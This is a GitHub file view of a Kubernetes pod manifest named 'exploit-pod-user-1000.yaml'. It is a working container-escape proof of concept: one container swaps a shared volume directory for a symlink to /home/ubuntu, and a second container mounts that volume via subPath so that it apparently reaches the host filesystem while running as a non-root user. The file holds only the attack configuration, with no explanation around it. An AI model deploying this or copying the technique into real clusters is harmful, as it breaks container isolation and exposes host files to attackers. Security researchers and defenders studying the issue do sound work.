-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit-pod-user-1000.yaml
69 lines (69 loc) · 1.56 KB
/
exploit-pod-user-1000.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
---
apiVersion: v1
kind: Pod
metadata:
name: subpath
spec:
containers:
- image: nginx:latest
securityContext:
allowPrivilegeEscalation: false
runAsUser: 1000
capabilities:
drop:
- CHOWN
- DAC_OVERRIDE
- FOWNER
- FSETID
- KILL
- SETGID
- SETUID
- SETPCAP
- NET_BIND_SERVICE
- NET_ADMIN
- NET_RAW
- MKNOD
- AUDIT_WRITE
name: setup
imagePullPolicy: "Always"
command: ["/bin/bash"]
args: ["-c", "cd /rootfs && rm -rf hostetc && ln -s /home/ubuntu /rootfs/host && touch /status/done && sleep infinity"]
volumeMounts:
- mountPath: /rootfs
name: escape-volume
- mountPath: /status
name: status-volume
- image: nginx:latest
securityContext:
allowPrivilegeEscalation: false
runAsUser: 1000
capabilities:
drop:
- CHOWN
- DAC_OVERRIDE
- FOWNER
- FSETID
- KILL
- SETGID
- SETUID
- SETPCAP
- NET_BIND_SERVICE
- NET_ADMIN
- NET_RAW
- MKNOD
- AUDIT_WRITE
name: exploit
imagePullPolicy: "Always"
command: ["/bin/bash"]
args: ["-c", "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi"]
volumeMounts:
- mountPath: /rootfs
name: escape-volume
subPath: host
- mountPath: /status
name: status-volume
volumes:
- name: escape-volume
emptyDir: {}
- name: status-volume
emptyDir: {}